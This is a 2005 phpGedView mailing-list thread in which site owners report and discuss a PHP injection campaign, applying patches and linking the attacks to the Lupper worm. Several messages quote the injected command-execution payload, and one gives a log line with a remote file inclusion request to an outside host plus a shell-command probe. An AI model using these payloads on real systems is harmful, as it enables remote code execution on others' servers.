phpgedview-talk

[Phpgedview-talk] attack attempt

[Matthew G. <ma...@po...>]

Hi all,

I had a curious user request on my phpGedView site.  Looks like they're=20
attempting some PHP injection style attack, using PHP code in the email=20
address and other field in the user table, like this:

\';error_reporting(0);if(isset($suntzu))
{system($_GET[suntzu]);die(\'HiMaster!\');}echo\'

=46rom my log files it looks like the attacker was trying to download a lin=
ux=20
binary and a PHP script using wget.  I grabbed the target files and can=20
provide a sample if anyone is interested in trying to un-pick what they do=
=20
(know a good linux dis-assembler?).

Doesn't look like they managed to do anything nasty, probably because wget=
=20
isn't available on my server.  Just a heads up for everyone to keep an eye=
=20
out.  Grep your logs for wget.

I reported the incident to SANS and they said they have seen it and sent me=
=20
this link, which looks like a published version of the exploit:

http://www.milw0rm.com/id.php?id=3D1379

=2E..which claims to affect versions <=3D 3.3.7.  I'm using phpGedView v3.3=
=2E4=20
final, so I think I would have been infected if I had had wget installed. =
=20
Watch yourselves!

I'm guessing we need a patch of some sort.

Regards,
=2D-=20
Matthew

RE: [Phpgedview-talk] attack attempt

[Heike El-A. - T. <hei...@ya...>]

Hi Matthew,
  had an attack also.
  I am using 3.2.2. final.
  What is this wget?
  Regards,
  Heike

Matthew Gates <ma...@po...> schrieb:
  Hi all,

I had a curious user request on my phpGedView site. Looks like they're 
attempting some PHP injection style attack, using PHP code in the email 
address and other field in the user table, like this:

\';error_reporting(0);if(isset($suntzu))
{system($_GET[suntzu]);die(\'HiMaster!\');}echo\'

From my log files it looks like the attacker was trying to download a linux 
binary and a PHP script using wget. I grabbed the target files and can 
provide a sample if anyone is interested in trying to un-pick what they do 
(know a good linux dis-assembler?).

Doesn't look like they managed to do anything nasty, probably because wget 
isn't available on my server. Just a heads up for everyone to keep an eye 
out. Grep your logs for wget.

I reported the incident to SANS and they said they have seen it and sent me 
this link, which looks like a published version of the exploit:

http://www.milw0rm.com/id.php?id=1379

...which claims to affect versions <= 3.3.7. I'm using phpGedView v3.3.4 
final, so I think I would have been infected if I had had wget installed. 
Watch yourselves!

I'm guessing we need a patch of some sort.

Regards,
-- 
Matthew



-------------------------------------------------------
This SF.net email is sponsored by: Splunk Inc. Do you grep through log files
for problems? Stop! Download the new AJAX search engine that makes
searching your log files as easy as surfing the web. DOWNLOAD SPLUNK!
http://ads.osdn.com/?ad_idv37&alloc_id865&op=click
_______________________________________________
Phpgedview-talk mailing list
Php...@li...
https://lists.sourceforge.net/lists/listinfo/phpgedview-talk
  


		
---------------------------------
Sarah Connor, Moshammer oder Papst Benedikt – die Top-Suchen 2005.

Re: [Phpgedview-talk] attack attempt

[Matthew G. <ma...@po...>]

wget is a command line tool for downloading web pages. You can use it for 
mirroring pages (making local copies of pages) and all sorts.  It's a very 
useful little tool, and is commonly installed on unix-like operating 
systems.  In this case the attacker is trying to use it to download some 
program (to do something - who knows what, but I bet it's not friendly).

On Tuesday 20 Dec 2005 20:57, Heike El-Ashi - Tromp wrote:
> Hi Matthew,
>   had an attack also.
>   I am using 3.2.2. final.
>   What is this wget?
>   Regards,
>   Heike
>
> Matthew Gates <ma...@po...> schrieb:
>   Hi all,
>
> I had a curious user request on my phpGedView site. Looks like they're
> attempting some PHP injection style attack, using PHP code in the email
> address and other field in the user table, like this:
>
> \';error_reporting(0);if(isset($suntzu))
> {system($_GET[suntzu]);die(\'HiMaster!\');}echo\'
>
> >From my log files it looks like the attacker was trying to download a
> > linux
>
> binary and a PHP script using wget. I grabbed the target files and can
> provide a sample if anyone is interested in trying to un-pick what they do
> (know a good linux dis-assembler?).
>
> Doesn't look like they managed to do anything nasty, probably because wget
> isn't available on my server. Just a heads up for everyone to keep an eye
> out. Grep your logs for wget.
>
> I reported the incident to SANS and they said they have seen it and sent
> me this link, which looks like a published version of the exploit:
>
> http://www.milw0rm.com/id.php?id=1379
>
> ...which claims to affect versions <= 3.3.7. I'm using phpGedView v3.3.4
> final, so I think I would have been infected if I had had wget installed.
> Watch yourselves!
>
> I'm guessing we need a patch of some sort.
>
> Regards,

Re: [Phpgedview-talk] attack attempt

[Heike El-A. - T. <hei...@ya...>]

thanks for info. As my pc is not linux-operated I assume no harm was done.
  Checked my phpGedView-log and saw that the hacker failed to login.
  Uploaded the patch anyway.
  Heike

Matthew Gates <ma...@po...> schrieb:
  wget is a command line tool for downloading web pages. You can use it for 
mirroring pages (making local copies of pages) and all sorts. It's a very 
useful little tool, and is commonly installed on unix-like operating 
systems. In this case the attacker is trying to use it to download some 
program (to do something - who knows what, but I bet it's not friendly).

On Tuesday 20 Dec 2005 20:57, Heike El-Ashi - Tromp wrote:
> Hi Matthew,
> had an attack also.
> I am using 3.2.2. final.
> What is this wget?
> Regards,
> Heike
>
> Matthew Gates schrieb:
> Hi all,
>
> I had a curious user request on my phpGedView site. Looks like they're
> attempting some PHP injection style attack, using PHP code in the email
> address and other field in the user table, like this:
>
> \';error_reporting(0);if(isset($suntzu))
> {system($_GET[suntzu]);die(\'HiMaster!\');}echo\'
>
> >From my log files it looks like the attacker was trying to download a
> > linux
>
> binary and a PHP script using wget. I grabbed the target files and can
> provide a sample if anyone is interested in trying to un-pick what they do
> (know a good linux dis-assembler?).
>
> Doesn't look like they managed to do anything nasty, probably because wget
> isn't available on my server. Just a heads up for everyone to keep an eye
> out. Grep your logs for wget.
>
> I reported the incident to SANS and they said they have seen it and sent
> me this link, which looks like a published version of the exploit:
>
> http://www.milw0rm.com/id.php?id=1379
>
> ...which claims to affect versions <= 3.3.7. I'm using phpGedView v3.3.4
> final, so I think I would have been infected if I had had wget installed.
> Watch yourselves!
>
> I'm guessing we need a patch of some sort.
>
> Regards,


-------------------------------------------------------
This SF.net email is sponsored by: Splunk Inc. Do you grep through log files
for problems? Stop! Download the new AJAX search engine that makes
searching your log files as easy as surfing the web. DOWNLOAD SPLUNK!
http://ads.osdn.com/?ad_id=7637&alloc_id=16865&op=click
_______________________________________________
Phpgedview-talk mailing list
Php...@li...
https://lists.sourceforge.net/lists/listinfo/phpgedview-talk
  


		
---------------------------------
Sarah Connor, Moshammer oder Papst Benedikt – die Top-Suchen 2005.
		
---------------------------------
Sarah Connor, Moshammer oder Papst Benedikt – die Top-Suchen 2005.

Re: [Phpgedview-talk] attack attempt

[Tastiger <tas...@sc...>]

Looks as though we are all getting the same person (s) trying this - 
looks as though mine didn't make it through registration

seems as though he is using the same registration name everywhere...

SUNTZU3645

Hello suntzu ...

A request was received at ( snip) to create an account with your 
email address ( 
\';error_reporting(0);if(isset($suntzu)){system($_GET[suntzu]);die(\'HiMaster!\');}echo\' 
).
Information about the request is shown under the link below.

Please click on the following link and fill in the requested data to 
verify your account and email address.

I have applied the patch anyway - thanks for that!




At 06:31 21/12/2005, you wrote:
>I had a curious user request on my phpGedView site.  Looks like they're
>attempting some PHP injection style attack, using PHP code in the email
>address and other field in the user table, like this

Re: [Phpgedview-talk] attack attempt

[Tastiger <tas...@sc...>]

Does anyone know if this attack dumps a file anywhere in your directories?

I've just received another 2 registration attempts from the same 
attack - so I'm wondering if they have managed to inject a file somewhere?

Re: [Phpgedview-talk] attack attempt

[Johan B. <mai...@go...>]

Hi Folks,

An another attempt here at http://barelds.good-it.com.
See below a piece from my webserver logs:

---------------------

81.91.66.220 - - [25/Dec/2005:05:38:06 +0100] 
"GET /phpgedview/help_text_vars.php?suntzu=df&PGV_BASE_DIRECTORY=http://mondomix-planet.com/radio/encrypt.txt
 HTTP/1.1" 200 64 "-" "Ziggy -- The Clown From Hell!!"

87.64.24.78 - - [25/Dec/2005:05:39:02 +0100] "GET /phpgedview/?suntzu=ls 
HTTP/1.1" 200 1542 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; 
Sgrunt|
V109|1012|S214027450|dialno; snprtz|dialno)"
---------------------
The URL mentioned in the log is still there and available.
Perhaps someone should notify the ISP?

Grz. Johan


Op dinsdag 20 december 2005 20:31, schreef Matthew Gates:
> Hi all,
>
> I had a curious user request on my phpGedView site.  Looks like they're
> attempting some PHP injection style attack, using PHP code in the email
> address and other field in the user table, like this:
>
> \';error_reporting(0);if(isset($suntzu))
> {system($_GET[suntzu]);die(\'HiMaster!\');}echo\'
>
> From my log files it looks like the attacker was trying to download a linux
> binary and a PHP script using wget.  I grabbed the target files and can
> provide a sample if anyone is interested in trying to un-pick what they do
> (know a good linux dis-assembler?).
>
> Doesn't look like they managed to do anything nasty, probably because wget
> isn't available on my server.  Just a heads up for everyone to keep an eye
> out.  Grep your logs for wget.
>
> I reported the incident to SANS and they said they have seen it and sent me
> this link, which looks like a published version of the exploit:
>
> http://www.milw0rm.com/id.php?id=1379
>
> ...which claims to affect versions <= 3.3.7.  I'm using phpGedView v3.3.4
> final, so I think I would have been infected if I had had wget installed.
> Watch yourselves!
>
> I'm guessing we need a patch of some sort.
>
> Regards,

-- 
Kind Regards / Met vriendelijke groet,

Johan Barelds		Good-IT!
Tel.+31(0)70-3296957	Martinus Nijhoffweg 42
Mob.+31(0)6-54253750	2548 EP  Den Haag
j.b...@go...	http://www.good-it.com

Re: [Phpgedview-talk] attack attempt

[S.C. G. <alp...@gm...>]

My server has been getting hit hard.

Much of their attenmpts seem random, they try for subdirectories to
applications I don't even have. Such as the follow subdirs, mambo, drupal,
blog, xmlrpc, phpgroupware, awstats etc...   mainly they are looking for "
xmlrpc.php"

The most brutal attacks come from 222.90.66.197
sys-206.196.101.28.primary.net 62.206.128.46 host.osmnetworks.net
mail.ctbullet.org

You may see my analog reports for yourself http://vinland.ath.cx/analog ,
and if you'd like to see my http error logs. I will post those as well.

p.s. I run an AlphaServer 1200 with FreeBSD. The only public reference to m=
y
server is my family tree listed on the phpgedview.net site. My server has
been up for 5 days, and has been getting attacked non stop since i posted m=
y
site on phpgedview.net

phpgedview should so soemthing about the hackers using their list.
---
---S.C. Gehl, 'Beauty to Burn'

Re: [Phpgedview-talk] attack attempt

[Tastiger <tas...@sc...>]

I'm not sure that blocking IPs is going to achieve anything as the IP 
address will rarely reflect the true IP of the attacker.

I haven't blocked any IPs - but applied both the patched files and I 
haven't had any attempts since.

If you have a look at your Phpgedview logs - you will see that they 
are attempting to login

EG:

21.12.2005 07:21:22 - 195.2.72.54 - Login Failed ->HiMaster!<-
21.12.2005 07:21:25 - 195.2.72.54 - User registration requested for: 
SUNTZU6312
21.12.2005 07:21:26 - 195.2.72.54 - Anonymous user added user -> SUNTZU6312 <-
21.12.2005 07:23:29 - 195.2.72.54 - Login Failed ->HiMaster!<-
21.12.2005 07:23:32 - 195.2.72.54 - User registration requested for: 
SUNTZU3645
21.12.2005 07:23:32 - 195.2.72.54 - Anonymous user added user -> SUNTZU3645 <-
21.12.2005 07:52:58 - 203.221.137.137 - Shane deleted user -> SUNTZU3645 <-
21.12.2005 07:53:07 - 203.221.137.137 - Shane deleted user -> SUNTZU3645 <-
21.12.2005 07:53:10 - 203.221.137.137 - Shane deleted user -> SUNTZU6312 <-
21.12.2005 08:19:53 - 84.204.210.34 - Login Failed ->HiMaster!<-
21.12.2005 08:19:56 - 84.204.210.34 - User registration requested 
for: SUNTZU1609
21.12.2005 08:19:56 - 84.204.210.34 - Anonymous user added user -> 
SUNTZU1609 <-
21.12.2005 08:20:43 - 84.204.210.34 - Login Failed ->HiMaster!<-
21.12.2005 08:20:47 - 84.204.210.34 - User registration requested 
for: SUNTZU4643
21.12.2005 08:20:47 - 84.204.210.34 - Anonymous user added user -> 
SUNTZU4643 <-
21.12.2005 10:09:13 - 67.19.24.66 - Login Failed ->HiMaster!<-
21.12.2005 10:09:17 - 67.19.24.66 - User registration requested for: 
SUNTZU5926
21.12.2005 10:09:17 - 67.19.24.66 - Anonymous user added user -> SUNTZU5926 <-
21.12.2005 10:09:32 - 67.19.24.66 - Login Failed ->HiMaster!<-
21.12.2005 10:09:36 - 67.19.24.66 - User registration requested for: 
SUNTZU9533

If your permission settings are set up properly it shouldn't be an issue

And as you can see from this excerpt of the log they have used 2 
different IPs in a matter of minutes

At 09:50 26/12/2005, you wrote:
>My server has been getting hit hard.
>
>Much of their attenmpts seem random, they try for subdirectories to 
>applications I don't even have. Such as the follow subdirs, mambo, 
>drupal, blog, xmlrpc, phpgroupware, awstats etc...   mainly they are 
>looking for " xmlrpc.php"

Re: [Phpgedview-talk] attack attempt

[S.C. G. <alp...@gm...>]

Yes, but bandwidth and anonymity is important...  If they continue to hack
me, my ISP will know I am running a server.

I tossed up PF firewall and snort. plus blocked them at my Linksys router..=
.
never the less. What kind of loser tries to deface a family tree? Where is
the gain? How are they making money at this? They are not American, so they
do not have the mindless destroyer excuse. ... it's puzzling.

Never-the-less, they are attacking everyone on the phpgedview list. the lis=
t
should be revised. It needs to have contact info not url info.

On 12/25/05, Tastiger <tas...@sc...> wrote:
>
> I'm not sure that blocking IPs is going to achieve anything as the IP
> address will rarely reflect the true IP of the attacker.
>
> I haven't blocked any IPs - but applied both the patched files and I
> haven't had any attempts since.
>
> If you have a look at your Phpgedview logs - you will see that they
> are attempting to login
>
> EG:
>
> 21.12.2005 07:21:22 - 195.2.72.54 - Login Failed ->HiMaster!<-
> 21.12.2005 07:21:25 - 195.2.72.54 - User registration requested for:
> SUNTZU6312
> 21.12.2005 07:21:26 - 195.2.72.54 - Anonymous user added user ->
> SUNTZU6312 <-
> 21.12.2005 07:23:29 - 195.2.72.54 - Login Failed ->HiMaster!<-
> 21.12.2005 07:23:32 - 195.2.72.54 - User registration requested for:
> SUNTZU3645
> 21.12.2005 07:23:32 - 195.2.72.54 - Anonymous user added user ->
> SUNTZU3645 <-
> 21.12.2005 07:52:58 - 203.221.137.137 - Shane deleted user -> SUNTZU3645
> <-
> 21.12.2005 07:53:07 - 203.221.137.137 - Shane deleted user -> SUNTZU3645
> <-
> 21.12.2005 07:53:10 - 203.221.137.137 - Shane deleted user -> SUNTZU6312
> <-
> 21.12.2005 08:19:53 - 84.204.210.34 - Login Failed ->HiMaster!<-
> 21.12.2005 08:19:56 - 84.204.210.34 - User registration requested
> for: SUNTZU1609
> 21.12.2005 08:19:56 - 84.204.210.34 - Anonymous user added user ->
> SUNTZU1609 <-
> 21.12.2005 08:20:43 - 84.204.210.34 - Login Failed ->HiMaster!<-
> 21.12.2005 08:20:47 - 84.204.210.34 - User registration requested
> for: SUNTZU4643
> 21.12.2005 08:20:47 - 84.204.210.34 - Anonymous user added user ->
> SUNTZU4643 <-
> 21.12.2005 10:09:13 - 67.19.24.66 - Login Failed ->HiMaster!<-
> 21.12.2005 10:09:17 - 67.19.24.66 - User registration requested for:
> SUNTZU5926
> 21.12.2005 10:09:17 - 67.19.24.66 - Anonymous user added user ->
> SUNTZU5926 <-
> 21.12.2005 10:09:32 - 67.19.24.66 - Login Failed ->HiMaster!<-
> 21.12.2005 10:09:36 - 67.19.24.66 - User registration requested for:
> SUNTZU9533
>
> If your permission settings are set up properly it shouldn't be an issue
>
> And as you can see from this excerpt of the log they have used 2
> different IPs in a matter of minutes
>
> At 09:50 26/12/2005, you wrote:
> >My server has been getting hit hard.
> >
> >Much of their attenmpts seem random, they try for subdirectories to
> >applications I don't even have. Such as the follow subdirs, mambo,
> >drupal, blog, xmlrpc, phpgroupware, awstats etc...   mainly they are
> >looking for " xmlrpc.php"
>
>
>
>
> -------------------------------------------------------
> This SF.net email is sponsored by: Splunk Inc. Do you grep through log
> files
> for problems?  Stop!  Download the new AJAX search engine that makes
> searching your log files as easy as surfing the  web.  DOWNLOAD SPLUNK!
> http://ads.osdn.com/?ad_id=3D7637&alloc_id=3D16865&op=3Dclick
> _______________________________________________
> Phpgedview-talk mailing list
> Php...@li...
> https://lists.sourceforge.net/lists/listinfo/phpgedview-talk
>



--
---S.C. Gehl, 'Beauty to Burn'

Re: [Phpgedview-talk] attack attempt

[Keith C. <ke...@dr...>]

S.C. Gehl wrote:

> Never-the-less, they are attacking everyone on the phpgedview list. 
> the list should be revised. It needs to have contact info not url info.

Not to say your wrong, but these attacks are more closely related to an 
XML-RPC for PHP vulnerability attack.  I'm not sure at the moment of 
PhpGedView uses XML-RPC directly, but many of the servers that host 
PhpGedView sites do have it enabled.  Many of these servers are shared 
servers with hundreds to thousands of web sites being hosted from each 
one.  The majority of these attacks seem to be coming from a variant of 
the Lupper worm.

Please see: http://vil.nai.com/vil/content/v_136821.htm

[quote]

The Lupper worm variants spreads by exploiting web servers hosting 
vulnerable PHP/CGI scripts. At least one variant has been identified as 
a modified derivative of the Linux/Slapper 
<http://vil.nai.com/vil/content/v_99693.htm> and BSD/Scalper 
<http://vil.nai.com/vil/content/v_99539.htm> worms from which it 
inherits the propagation strategy.

The worm blindly attacks web servers by sending malicious HTTP requests 
on port 80. If the target server is running one of the vulnerable 
scripts at specific URLs and is configured to permit external shell 
commands and remote file download in the PHP/CGI environment, a copy of 
the worm could be downloaded and executed.

[/quote]

Most viruses are easily altered to attack specific sites.  The Lupper 
work in general tries to find sites who use content management systems 
like, PHP-Nuke, Post-Nuke, Mambo, xoops, wordpress, etc.  I probably 
wouldn't be too far off to say someone has altered this to look for 
unpatched PhpGedView sites.  As Tastiger said, "it's because it's there 
and it can be done. To them it's a game and to see who can hack the most 
sites". 

Your best line of defense here is to upgrade/update your PhpGedView site 
with the patch provided by John, or upgrade to PhpGedView 4.0b3 which 
has this patch already applied.

If you host your own server, you'll want to make sure you have XML-RPC 
for PHP updated to the latest version 
(http://sourceforge.net/project/showfiles.php?group_id=34455)
If you host through a hosting provider, contact your help desk and ask 
them to make sure this vulnerability has been addressed, since they are 
responsible for the day to day maintenance of your servers.

Eventually this will die down, and things will become normal again until 
the next vulnerability is found.  Welcome to the world of web hosting.  
It's a cat and mouse game that you can't let your guard down for a moment.

For farther reading, please take a look here, and follow the other links 
as well.
http://isc.sans.org/diary.php?storyid=823

Re: [Phpgedview-talk] attack attempt

[Tastiger <tas...@sc...>]

Don't blame the list - I'm not on it - and I had an attempt - but 
then I have 5 Postnuke sites so I'm used to these script kiddies and 
their antics.

If you want to know why they do it - well it's because it's there and 
it can be done. To them it's a game and to see who can hack the most 
sites - doesn't matter if it's a private family tree or some huge 
business. I run a support group for alternative lifestyles that has 
been hit 5 times in the past 12 months and they still keep looking 
for vulnerabilities even though I have upgraded the site regularly.

As for anonymity  - well once you run a server, I'm afraid that is 
something that one must lose - if you want anonymity then don't have 
a web site and I'm sorry but if you are running a server without your 
ISP's knowledge that seems like a personal problem to me

The point I am making is don't blame the list for these attempts - if 
you want to find sites using  Phpgedview anyone can do a Google on 
that key word and come up with links to sites running  Phpgedview.

The bottom line is there was a vulnerability in the package and that 
hole has now been plugged - until someone finds a new hole then we do 
it all over again - welcome to the world of PHP :-D

At 10:32 26/12/2005, you wrote:
>Never-the-less, they are attacking everyone on the phpgedview list. 
>the list should be revised. It needs to have contact info not url info.